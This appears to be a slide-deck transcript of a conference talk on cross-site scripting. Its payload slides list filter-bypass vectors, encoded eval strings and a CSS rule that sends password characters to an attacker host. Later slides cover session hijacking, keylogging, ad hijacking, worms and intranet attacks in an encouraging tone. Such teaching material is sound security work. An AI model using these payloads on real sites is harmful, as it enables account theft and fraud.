Xss is more than a simple threat

XSS is more than a simple threat Avădănei Andrei Software Developer, Blogger, Student www.worldit.info @AndreiAvadanei [email_address] #RoCyberCon @20 february

Introduction to XSS Short story XSS types Shouts

Short story XSS - it's a client side vulnerability - … but can become a server side one - based on Javascript injection - … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on - is the second most popular threat in 2010 (via Infosec & OWASP) - with many resources available on the Internet (use Google)

XSS Types Non-persistent (reflected) - the most common type of XSS injection - requires server side interpretation of the query - third-party required Persistent (stored) - the most dangerous type of XSS injection - requires server side interpretation of the query and data storing - third-party may not be required Dom-based - the newest type of XSS injection - requires client side interpretation - usually non-persistent

Shouts #5 More XSS 'ed Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info , PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.

Getting XSS 'ed Where? Basic XSS'ing Advanced XSS'ing HTML 5 XSS'ed Bypass XSS protection

Where? everywhere Rule : ” Do not trust in anything ever, especially when it comes to user input. ” XSS vulnerabilities can be found in anything that came from user. GET, POST, COOKIE, FILES, SERVER and Headers are main targets. Try to be clever.

Basic XSS 'ing <script>alert(1)</script> //basic “ ><script>alert(1)</script> //bypass a open tag <img src=x onerror=alert(1)//"> //bypass & generate a error “ onmouseover=”alert(1)” //all javascript events alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors <script>alert(String.fromCharCode(88,83,83));</script> //bypass quotes filters <IMG SRC=javascript:alert('XSS')> //unicode injection; utf-8, hex, decimal or octal injection may work <meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion <style type=text/javascript>alert('xss')</style> //javascript injection based on style tag “ ><img src=”x:x” onerror=”alert(0)”> // :D […]

Advanced XSS 'ing <META HTTP-EQUIV="refresh" CONTENT="0;url= data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K "> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL= javascript:alert('XSS ');"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> //send IE into a loop <XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //xss in xml document x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from every day injections Function('a\x6cert(1)')(); // ;) x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection [...]

HTML 5 XSS 'ed - new technologies, new problems <video onerror=” javascript:alert(1 )”><source> //new tag <audio onerror=”javascript:alert(1)”><source> //other new tag <form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events <div draggable=”true” ondragstart=”event.dataTransfer.setData('text/plain', ' Evil payload ')”> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes <input type="text" AUTOFOCUS onfocus=alert(1)> <script>alert(localStorage.getItem('foo'))</script> //access local storage “ ><script>(history.pushState({},”,'index.php'))(document.forms[0].action=' http://maliciousURL ')</script> //conceal the real location and replace it with anything we want. Ex : http://bit.ly/pushStateXSS

Bypass XSS protection <img/src="mars.png"alt="mars"> //no white spaces, use / instead <object data=" javascript:alert(0 )"> //avoid src <isindex type=image src=1 onerror=alert(1)> //did you know isindex tag? <img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation location=location.hash.slice(1); //avoid the # http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results ""+{toString:alert} or ""+{valueOf:alert} //Executes function without using () or = Future tricks in HTML 5 </a onmousemove="alert(1)"> //html 5 will support events in closed tags <style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure xss-based XSS data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg == //avoid using plain text/html value ?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi via BlackHat Conferences.

XSS Injection Exploitation (part 1) Redirection Clickjacking URL Spoofing Session hijacking Cookie stuffing Ad Hijacking CSRF/XSRF attacks History stealling XSS Defacement Key & Mouse logging

Redirection & Clickjacking Redirection redirect your victim, ex. document.location = ”http://www.your-evil-site.com”; you create fake traffic popular Clickjacking describes one websites that poses as another. ex. : redirect victim to you onclick event calling used in phishing, gives high credibility extremely popular

URL Spoofing popular in phishing the url is user friendly the web page content is hijacked and all information are send to monitored websites by a thief extremely popular

Session Hijacking also known as ”Cookie Stealling” usually used with document.cookie help you to gain control over other logged session needs a cookie grabber for instance, XSS in *.yahoo.com can help you to hijack Yahoo accounts extremely popular

Cookie stuffing also known as cookie dropping used in blackhat online marketing generates illegitimate affiliate sellings by hijacking cookies uses pop-ups, frames and iframes, images, javascript, stylesheets or flash for accomplishing cookie dropping popular

Ad Hijacking used in blackhat online marketing usually requires persistent XSS you can modify ad scripts with your own, getting paid when user clicks on hijacked ads popular

CSRF/XSRF attacks unauthorized commands are transmited from an user that website trusts. usually used along with <img src=””. for instance, if <img src=” http://victim.com/?do=logout ” /> is permanently injected and an user acces the page with malformated content, he will be forced to log out. use your imagination, you can do more than that.

History Stealling You can find out what sites have been visited by the victim using ” getComputedStyle ” like bellow, after you createad a node with CSS visited selector having a custom known color : document.defaultView.getComputedStyle( link , null).getPropertyValue("color"); rarely used, but still important it could be done using the full power of HTML 5

XSS Defacement looks like server side defaced pages … but it's only a client side deface can create chaos and confusion when they are used for hacking an website invoves changing the HTML content of the page of course, two types : persistent and non-persistent persistent XSS deface are more dangerous than no-persistent

Key & Mouse Logging Keylogging - log all keystrokes and send remotely - document.onkeypress / unsafeWindow.onkeypress events - store keystrokes on a local variable and send them regular on a remote server Mouse logging - log all mouse moves and send remotely - document.onmousemove event - dangerous but not so popular 0

Tired? You shouldn't, because this is only the beggining...

XSS Injection Exploitation (part 2) Browser hijacking Port Scanning DDoS XSS Tunneling Distributed Password Cracking Worms (Spreading) Arbitrary file execution & Privilege escalation Intranet Hacking

Browser Hijacking Also known as Tab Hijacking . Highly recommended when hacker want a second shot on victims. XSS Shells usually do for you With iframe injection Working until the victim close the tab. The only drawback with this method is that the URL bar does not change with each click, which may or may not be noticeable to the user.

Distributed port scanning Cross domain XMLHttpRequests and WebSockets for performing remote port scanning, but using XSS you can do distributed remote port scanning Latest Firefox, Chrome or Safari supports already these new technolologies This option it's not available yet but it will in the next generation of XSS Shell Firefox & Safari time connection is less than 100 ms 1 victim – 65,000 scanned ports – 6,500 seconds 100 victims - 65,000 scanned ports – 6,5 seconds What about 1,000 or 10,000 victims?

DDoS Based on WebSockets Application-level DDoS attacks (layer 7 DDoS) Cross Origin Request (COR) are processed even if the site has restriction and therefore the request will create a load on the server 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests 1 minute – 600 browser – over 100, 000 requests / minute can be enought to shut down a target We should wait for upgrading the majority of the browsers in the world But blackhat teams will be prepared with amazing tools for DDoS

XSS Tunneling XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack. At technical level, it may be an Ajax application. Node.js and Comet Push can make difference in the future XSS Shells. XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies. XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system. You can tunnel all your traffic throught a XSS Channel. You can build your own SSH-like protocol. You can forget about the user session problem when hijacking is not possible because there is an IP adress restriction. Again, your imagination is the limit.

Distributed Password Cracking Javascript engines are becoming verry fast. And we have WebWorkers. Password guessing rates in Javascript tools of 100,000 MD5 hashes/second . ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code. But, in these days spreading methods are verry effective. Why not 10,000 compromised machines? Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers. Perform password cracking in background JavaScript threads. Support salted MD5 and SHA hashes.

Worms (spreading) One of the most efficient environment for worm propagation - social networking XSS Warhol Worm Linear XSS Worm Hydra XSS Worm Samy (2005) inffected over 1,000,000 users from MySace in 20 hours Yahoo!, Hi5, Twitter and Facebook could easily be next targets on a larger scale. You can simply attach a trojan with your Worm and the risks of creating permanent zombies are growing.

Arbitrary file execution In 2008 a vulnerability which affected the IE 7 & IE 8 could execute some arbitrary files using some social engineering skills. During last years few other similar vulnerabilities appeard on Internet jungle. Still, a XSS vulnerability and a CSRF vulnerability in a administrator file editor, which can be bypassed with XMLHttpRequest to the same origin requests an you have the right combination : a XSS vulnerability has become arbitrary code execution ( privilege escalation ). What are you waiting for? Find the next one major privilege escalation vulnerability.

Intranet Hacking (part 1) Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?

Intranet Hacking (part 2) Exploit procedures : A victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser. JavaScript malware loads a Java applet revealing the victim’s internal NAT IP address. Then, using the victim’s Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network. Attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection.

Intranet Hacking (part 3) Collecting information : Obtaining NAT'ed IP Adress – MyAddress, a special Java Applet Port scanning - <script src= http://ip/ ></script> Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting. <img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" /> Attack the intranet - try different well-known vulnerabilities - try hacking the web interface of DSL routers - load local files using file:/// - get help from XSS Shells

Preventing XSS attacks Filtering Input / Output encoding Web browser security - select a safer browser (Chrome) - use a virtual machine for suspicious links - pay more attention to shortened urls - use plugins for better security (like NoScript)

XSS it's still a simple threat? :)

Bibliography Experience & Google.

Xss is more than a simple threat

More Related Content

What's hot

Viewers also liked

Similar to Xss is more than a simple threat

More from Avădănei Andrei

Recently uploaded

Xss is more than a simple threat